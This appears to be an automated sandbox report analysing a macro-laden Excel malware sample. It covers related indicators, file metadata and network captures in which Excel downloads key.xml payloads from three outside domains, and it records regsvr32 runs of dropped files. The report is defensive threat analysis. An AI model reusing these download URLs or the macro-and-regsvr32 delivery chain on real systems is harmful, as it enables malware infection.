                  23:39:20API Interceptor271x Sleep call for process: regsvr32.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  199.79.63.251recital-1302341626.xlsGet hashmaliciousBrowse
                    recital-1302341626.xlsGet hashmaliciousBrowse
                      recital-123154428.xlsGet hashmaliciousBrowse
                        recital-123154428.xlsGet hashmaliciousBrowse
                          162.251.80.22recital-1302341626.xlsGet hashmaliciousBrowse
                            recital-1302341626.xlsGet hashmaliciousBrowse
                              recital-123154428.xlsGet hashmaliciousBrowse
                                recital-123154428.xlsGet hashmaliciousBrowse
                                  162.222.225.250recital-1302341626.xlsGet hashmaliciousBrowse
                                    recital-1302341626.xlsGet hashmaliciousBrowse
                                      recital-123154428.xlsGet hashmaliciousBrowse
                                        recital-123154428.xlsGet hashmaliciousBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          geit.inrecital-1302341626.xlsGet hashmaliciousBrowse
                                          • 162.251.80.22
                                          recital-1302341626.xlsGet hashmaliciousBrowse
                                          • 162.251.80.22
                                          recital-123154428.xlsGet hashmaliciousBrowse
                                          • 162.251.80.22
                                          recital-123154428.xlsGet hashmaliciousBrowse
                                          • 162.251.80.22
                                          mercanets.comrecital-1302341626.xlsGet hashmaliciousBrowse
                                          • 162.222.225.250
                                          recital-1302341626.xlsGet hashmaliciousBrowse
                                          • 162.222.225.250
                                          recital-123154428.xlsGet hashmaliciousBrowse
                                          • 162.222.225.250
                                          recital-123154428.xlsGet hashmaliciousBrowse
                                          • 162.222.225.250
                                          gillcart.comrecital-1302341626.xlsGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          recital-1302341626.xlsGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          recital-123154428.xlsGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          recital-123154428.xlsGet hashmaliciousBrowse
                                          • 199.79.63.251

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          PUBLIC-DOMAIN-REGISTRYUSNuevo pedido # 765-3523663 ,pdf.exeGet hashmaliciousBrowse
                                          • 208.91.199.223
                                          PO#1135 - #U88d5#U5049.exeGet hashmaliciousBrowse
                                          • 208.91.199.224
                                          recital-1302341626.xlsGet hashmaliciousBrowse
                                          • 162.222.225.250
                                          recital-1302341626.xlsGet hashmaliciousBrowse
                                          • 162.222.225.250
                                          recital-123154428.xlsGet hashmaliciousBrowse
                                          • 162.222.225.250
                                          recital-123154428.xlsGet hashmaliciousBrowse
                                          • 162.222.225.250
                                          dhl_doc88654325571.exeGet hashmaliciousBrowse
                                          • 208.91.198.143
                                          ORDER _NO_32017.docGet hashmaliciousBrowse
                                          • 162.215.241.145
                                          New Order.pdf.exeGet hashmaliciousBrowse
                                          • 208.91.199.225
                                          Curriculum Vitae Milani.exeGet hashmaliciousBrowse
                                          • 208.91.199.224
                                          usermasabiczx.exeGet hashmaliciousBrowse
                                          • 199.79.62.16
                                          IfF08zoTKQNagy0.exeGet hashmaliciousBrowse
                                          • 208.91.198.143
                                          vNBfeEsb8L.docGet hashmaliciousBrowse
                                          • 204.11.58.87
                                          Inquiry - Specifications 002021 (2).exeGet hashmaliciousBrowse
                                          • 208.91.199.223
                                          #RFQ SUPPLY Unilever House UK.exeGet hashmaliciousBrowse
                                          • 208.91.199.224
                                          O2bxPCQqfl.exeGet hashmaliciousBrowse
                                          • 208.91.199.224
                                          PO00174Quotations.exeGet hashmaliciousBrowse
                                          • 208.91.199.224
                                          PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                          • 208.91.199.223
                                          New Order for UT- materials.exeGet hashmaliciousBrowse
                                          • 208.91.198.143
                                          payment-copy (2).exeGet hashmaliciousBrowse
                                          • 208.91.199.224
                                          PUBLIC-DOMAIN-REGISTRYUSNuevo pedido # 765-3523663 ,pdf.exeGet hashmaliciousBrowse
                                          • 208.91.199.223
                                          PO#1135 - #U88d5#U5049.exeGet hashmaliciousBrowse
                                          • 208.91.199.224
                                          recital-1302341626.xlsGet hashmaliciousBrowse
                                          • 162.222.225.250
                                          recital-1302341626.xlsGet hashmaliciousBrowse
                                          • 162.222.225.250
                                          recital-123154428.xlsGet hashmaliciousBrowse
                                          • 162.222.225.250
                                          recital-123154428.xlsGet hashmaliciousBrowse
                                          • 162.222.225.250
                                          dhl_doc88654325571.exeGet hashmaliciousBrowse
                                          • 208.91.198.143
                                          ORDER _NO_32017.docGet hashmaliciousBrowse
                                          • 162.215.241.145
                                          New Order.pdf.exeGet hashmaliciousBrowse
                                          • 208.91.199.225
                                          Curriculum Vitae Milani.exeGet hashmaliciousBrowse
                                          • 208.91.199.224
                                          usermasabiczx.exeGet hashmaliciousBrowse
                                          • 199.79.62.16
                                          IfF08zoTKQNagy0.exeGet hashmaliciousBrowse
                                          • 208.91.198.143
                                          vNBfeEsb8L.docGet hashmaliciousBrowse
                                          • 204.11.58.87
                                          Inquiry - Specifications 002021 (2).exeGet hashmaliciousBrowse
                                          • 208.91.199.223
                                          #RFQ SUPPLY Unilever House UK.exeGet hashmaliciousBrowse
                                          • 208.91.199.224
                                          O2bxPCQqfl.exeGet hashmaliciousBrowse
                                          • 208.91.199.224
                                          PO00174Quotations.exeGet hashmaliciousBrowse
                                          • 208.91.199.224
                                          PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                          • 208.91.199.223
                                          New Order for UT- materials.exeGet hashmaliciousBrowse
                                          • 208.91.198.143
                                          payment-copy (2).exeGet hashmaliciousBrowse
                                          • 208.91.199.224

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          7dcce5b76c8b17472d024758970a406bEM2101167 CC - P.docGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          recital-1302341626.xlsGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          recital-123154428.xlsGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          FedEx AWB 884174658339 .docGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          Original copy of Bill of lading and AWB documents.docGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          Purchase order PO06708.docGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          TransferCopy.docGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          INVOICE PACKING LIST PO 16005704 6200001419 CAPTOPRIL 1600 200kg SYN2021091407.docGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          450-0176455.pptGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          InvPixcareer.-0048_20210927.xlsbGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          InvPixcareer.-289609891_20210927.xlsbGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          waffle_lol.xlsGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          V-21-Kiel-050-D02.docxGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          MT103.docGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          D.I. Pipes Fittings.docGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          InvPixcareer.-5589234_20210927.xlsbGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          recital-239880844.xlsGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          waff.xlsGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22
                                          qkF3PCHVXs.xlsGet hashmaliciousBrowse
                                          • 199.79.63.251
                                          • 162.222.225.250
                                          • 162.251.80.22

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          No created / dropped files found

                                          Static File Info

                                          General

                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Sep 29 08:59:46 2021, Security: 0
                                          Entropy (8bit):7.351326128821904
                                          TrID:
                                          • Microsoft Excel sheet (30009/1) 78.94%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                          File name:SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls
                                          File size:250368
                                          MD5:7b83b99dace5664b9ab5c0c3882be408
                                          SHA1:4c4893beca92234c023ee2dfff759e155c643ed3
                                          SHA256:e005a59b0ab458c8a1ab6883e17504382bd72d2e9de8eb99c785de520c258c0c
                                          SHA512:49f7f8746555e83d7a52afb63c108597db8510df1e4d0c5b350848d411245b700e012ba09421a39466a487f9450439b7aa4b7fea459c88d90299b3de1289bd24
                                          SSDEEP:6144:iKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgD9fWvcZZdtLq1JOjbwvOMPDslAvS3+Hw7c:n9fVrLmUjbwvrDa33LvfH1WO2
                                          File Content Preview:........................>......................................................................................................................................................................................................................................

                                          File Icon

                                          Icon Hash:e4eea286a4b4bcb4

                                          Static OLE Info

                                          General

                                          Document Type:OLE
                                          Number of OLE Files:1

                                          OLE File "SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls"

                                          Indicators

                                          Has Summary Info:True
                                          Application Name:Microsoft Excel
                                          Encrypted Document:False
                                          Contains Word Document Stream:False
                                          Contains Workbook/Book Stream:True
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:
                                          Flash Objects Count:
                                          Contains VBA Macros:True

                                          Summary

                                          Code Page:1251
                                          Author:
                                          Last Saved By:
                                          Create Time:2015-06-05 18:19:34
                                          Last Saved Time:2021-09-29 07:59:46
                                          Creating Application:Microsoft Excel
                                          Security:0

                                          Document Summary

                                          Document Code Page:1251
                                          Thumbnail Scaling Desired:False
                                          Company:
                                          Contains Dirty Links:False
                                          Shared Document:False
                                          Changed Hyperlinks:False
                                          Application Version:1048576

                                          Streams

                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          File Type:data
                                          Stream Size:4096
                                          Entropy:0.419621160955
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . , . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s s s y y y m 1 . . . . . s s s s y y m m 2 . . . . . S h e e t . . . . . E D . . . . . R H Y . . . . . S b r 1
                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 2c 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ec 00 00 00
                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                          General
                                          Stream Path:\x5SummaryInformation
                                          File Type:data
                                          Stream Size:4096
                                          Entropy:0.275408622527
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 238868
                                          General
                                          Stream Path:Workbook
                                          File Type:Applesoft BASIC program data, first line number 16
                                          Stream Size:238868
                                          Entropy:7.53398047476
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . . . .
                                          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 29, 2021 23:38:43.907820940 CEST49167443192.168.2.22199.79.63.251
                                          Sep 29, 2021 23:38:43.907876015 CEST44349167199.79.63.251192.168.2.22
                                          Sep 29, 2021 23:38:43.907963991 CEST49167443192.168.2.22199.79.63.251
                                          Sep 29, 2021 23:38:43.919250011 CEST49167443192.168.2.22199.79.63.251
                                          Sep 29, 2021 23:38:43.919295073 CEST44349167199.79.63.251192.168.2.22
                                          Sep 29, 2021 23:38:44.438200951 CEST44349167199.79.63.251192.168.2.22
                                          Sep 29, 2021 23:38:44.438308954 CEST49167443192.168.2.22199.79.63.251
                                          Sep 29, 2021 23:38:44.447813034 CEST49167443192.168.2.22199.79.63.251
                                          Sep 29, 2021 23:38:44.447846889 CEST44349167199.79.63.251192.168.2.22
                                          Sep 29, 2021 23:38:44.448210001 CEST44349167199.79.63.251192.168.2.22
                                          Sep 29, 2021 23:38:44.448283911 CEST49167443192.168.2.22199.79.63.251
                                          Sep 29, 2021 23:38:44.665024042 CEST49167443192.168.2.22199.79.63.251
                                          Sep 29, 2021 23:38:44.707134962 CEST44349167199.79.63.251192.168.2.22
                                          Sep 29, 2021 23:38:45.471273899 CEST44349167199.79.63.251192.168.2.22
                                          Sep 29, 2021 23:38:45.471366882 CEST44349167199.79.63.251192.168.2.22
                                          Sep 29, 2021 23:38:45.471448898 CEST49167443192.168.2.22199.79.63.251
                                          Sep 29, 2021 23:38:45.471486092 CEST44349167199.79.63.251192.168.2.22
                                          Sep 29, 2021 23:38:45.471508026 CEST49167443192.168.2.22199.79.63.251
                                          Sep 29, 2021 23:38:45.471564054 CEST49167443192.168.2.22199.79.63.251
                                          Sep 29, 2021 23:38:45.473181009 CEST49167443192.168.2.22199.79.63.251
                                          Sep 29, 2021 23:38:45.473227024 CEST49167443192.168.2.22199.79.63.251
                                          Sep 29, 2021 23:38:45.623178005 CEST49168443192.168.2.22162.251.80.22
                                          Sep 29, 2021 23:38:45.623245955 CEST44349168162.251.80.22192.168.2.22
                                          Sep 29, 2021 23:38:45.623338938 CEST49168443192.168.2.22162.251.80.22
                                          Sep 29, 2021 23:38:45.624327898 CEST49168443192.168.2.22162.251.80.22
                                          Sep 29, 2021 23:38:45.624356985 CEST44349168162.251.80.22192.168.2.22
                                          Sep 29, 2021 23:38:46.144764900 CEST44349168162.251.80.22192.168.2.22
                                          Sep 29, 2021 23:38:46.145029068 CEST49168443192.168.2.22162.251.80.22
                                          Sep 29, 2021 23:38:46.162062883 CEST49168443192.168.2.22162.251.80.22
                                          Sep 29, 2021 23:38:46.162136078 CEST44349168162.251.80.22192.168.2.22
                                          Sep 29, 2021 23:38:46.162427902 CEST44349168162.251.80.22192.168.2.22
                                          Sep 29, 2021 23:38:46.162540913 CEST49168443192.168.2.22162.251.80.22
                                          Sep 29, 2021 23:38:46.177762985 CEST49168443192.168.2.22162.251.80.22
                                          Sep 29, 2021 23:38:46.219177008 CEST44349168162.251.80.22192.168.2.22
                                          Sep 29, 2021 23:38:46.653835058 CEST44349168162.251.80.22192.168.2.22
                                          Sep 29, 2021 23:38:46.653966904 CEST44349168162.251.80.22192.168.2.22
                                          Sep 29, 2021 23:38:46.654112101 CEST49168443192.168.2.22162.251.80.22
                                          Sep 29, 2021 23:38:46.654145956 CEST49168443192.168.2.22162.251.80.22
                                          Sep 29, 2021 23:38:46.654364109 CEST49168443192.168.2.22162.251.80.22
                                          Sep 29, 2021 23:38:46.654395103 CEST44349168162.251.80.22192.168.2.22
                                          Sep 29, 2021 23:38:46.654454947 CEST49168443192.168.2.22162.251.80.22
                                          Sep 29, 2021 23:38:46.654510975 CEST49168443192.168.2.22162.251.80.22
                                          Sep 29, 2021 23:38:46.938553095 CEST49169443192.168.2.22162.222.225.250
                                          Sep 29, 2021 23:38:46.938594103 CEST44349169162.222.225.250192.168.2.22
                                          Sep 29, 2021 23:38:46.938770056 CEST49169443192.168.2.22162.222.225.250
                                          Sep 29, 2021 23:38:46.939771891 CEST49169443192.168.2.22162.222.225.250
                                          Sep 29, 2021 23:38:46.939795971 CEST44349169162.222.225.250192.168.2.22
                                          Sep 29, 2021 23:38:47.440028906 CEST44349169162.222.225.250192.168.2.22
                                          Sep 29, 2021 23:38:47.440299034 CEST49169443192.168.2.22162.222.225.250
                                          Sep 29, 2021 23:38:47.455526114 CEST49169443192.168.2.22162.222.225.250
                                          Sep 29, 2021 23:38:47.455610991 CEST44349169162.222.225.250192.168.2.22
                                          Sep 29, 2021 23:38:47.455903053 CEST44349169162.222.225.250192.168.2.22
                                          Sep 29, 2021 23:38:47.456013918 CEST49169443192.168.2.22162.222.225.250
                                          Sep 29, 2021 23:38:47.463496923 CEST49169443192.168.2.22162.222.225.250
                                          Sep 29, 2021 23:38:47.507232904 CEST44349169162.222.225.250192.168.2.22
                                          Sep 29, 2021 23:38:49.322968960 CEST44349169162.222.225.250192.168.2.22
                                          Sep 29, 2021 23:38:49.323235989 CEST49169443192.168.2.22162.222.225.250
                                          Sep 29, 2021 23:38:49.324649096 CEST44349169162.222.225.250192.168.2.22
                                          Sep 29, 2021 23:38:49.324719906 CEST44349169162.222.225.250192.168.2.22
                                          Sep 29, 2021 23:38:49.324769020 CEST49169443192.168.2.22162.222.225.250
                                          Sep 29, 2021 23:38:49.324789047 CEST49169443192.168.2.22162.222.225.250
                                          Sep 29, 2021 23:40:43.525870085 CEST49169443192.168.2.22162.222.225.250
                                          Sep 29, 2021 23:40:43.529139042 CEST49169443192.168.2.22162.222.225.250

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 29, 2021 23:38:43.649363041 CEST5216753192.168.2.228.8.8.8
                                          Sep 29, 2021 23:38:43.891751051 CEST53521678.8.8.8192.168.2.22
                                          Sep 29, 2021 23:38:45.497734070 CEST5059153192.168.2.228.8.8.8
                                          Sep 29, 2021 23:38:45.617288113 CEST53505918.8.8.8192.168.2.22
                                          Sep 29, 2021 23:38:46.683339119 CEST5780553192.168.2.228.8.8.8
                                          Sep 29, 2021 23:38:46.936165094 CEST53578058.8.8.8192.168.2.22

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Sep 29, 2021 23:38:43.649363041 CEST192.168.2.228.8.8.80x372Standard query (0)gillcart.comA (IP address)IN (0x0001)
                                          Sep 29, 2021 23:38:45.497734070 CEST192.168.2.228.8.8.80x3abdStandard query (0)geit.inA (IP address)IN (0x0001)
                                          Sep 29, 2021 23:38:46.683339119 CEST192.168.2.228.8.8.80x6667Standard query (0)mercanets.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Sep 29, 2021 23:38:43.891751051 CEST8.8.8.8192.168.2.220x372No error (0)gillcart.com199.79.63.251A (IP address)IN (0x0001)
                                          Sep 29, 2021 23:38:45.617288113 CEST8.8.8.8192.168.2.220x3abdNo error (0)geit.in162.251.80.22A (IP address)IN (0x0001)
                                          Sep 29, 2021 23:38:46.936165094 CEST8.8.8.8192.168.2.220x6667No error (0)mercanets.com162.222.225.250A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • gillcart.com
                                          • geit.in
                                          • mercanets.com

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.2249167199.79.63.251443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          TimestampkBytes transferredDirectionData
                                          2021-09-29 21:38:44 UTC0OUTGET /Cdpmoyhr/key.xml HTTP/1.1
                                          Accept: */*
                                          UA-CPU: AMD64
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: gillcart.com
                                          Connection: Keep-Alive
                                          2021-09-29 21:38:45 UTC0INHTTP/1.1 404 Not Found
                                          Date: Wed, 29 Sep 2021 21:38:44 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Vary: Accept-Encoding
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html;charset=utf-8
                                          2021-09-29 21:38:45 UTC0INData Raw: 33 65 38 32 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e
                                          Data Ascii: 3e82<!DOCTYPE html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="X-UA-Compatible" content="ie=edge"><meta name="viewport" con
                                          2021-09-29 21:38:45 UTC8INData Raw: 6c 20 63 6c 61 73 73 3d 22 63 61 74 65 67 6f 72 69 65 73 5f 6d 65 67 61 5f 6d 65 6e 75 20
                                          Data Ascii: l class="categories_mega_menu


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.2249168162.251.80.22443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          TimestampkBytes transferredDirectionData
                                          2021-09-29 21:38:46 UTC8OUTGET /MeOlE9Xxd/key.xml HTTP/1.1
                                          Accept: */*
                                          UA-CPU: AMD64
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: geit.in
                                          Connection: Keep-Alive
                                          2021-09-29 21:38:46 UTC8INHTTP/1.1 200 OK
                                          Date: Wed, 29 Sep 2021 21:38:46 GMT
                                          Server: nginx/1.19.5
                                          Content-Type: text/html; charset=UTF-8
                                          Content-Length: 0
                                          X-Server-Cache: true
                                          X-Proxy-Cache: HIT
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.2249169162.222.225.250443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          TimestampkBytes transferredDirectionData
                                          2021-09-29 21:38:47 UTC8OUTGET /9DPZqAfZdq5z/key.xml HTTP/1.1
                                          Accept: */*
                                          UA-CPU: AMD64
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: mercanets.com
                                          Connection: Keep-Alive
                                          2021-09-29 21:38:49 UTC9INHTTP/1.1 200 OK
                                          Date: Wed, 29 Sep 2021 21:38:47 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:23:39:13
                                          Start date:29/09/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                          Imagebase:0x13f110000
                                          File size:28253536 bytes
                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:23:39:20
                                          Start date:29/09/2021
                                          Path:C:\Windows\System32\regsvr32.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
                                          Imagebase:0xff9f0000
                                          File size:19456 bytes
                                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:23:39:20
                                          Start date:29/09/2021
                                          Path:C:\Windows\System32\regsvr32.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
                                          Imagebase:0xff9f0000
                                          File size:19456 bytes
                                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:23:39:20
                                          Start date:29/09/2021
                                          Path:C:\Windows\System32\regsvr32.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
                                          Imagebase:0xff9f0000
                                          File size:19456 bytes
                                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >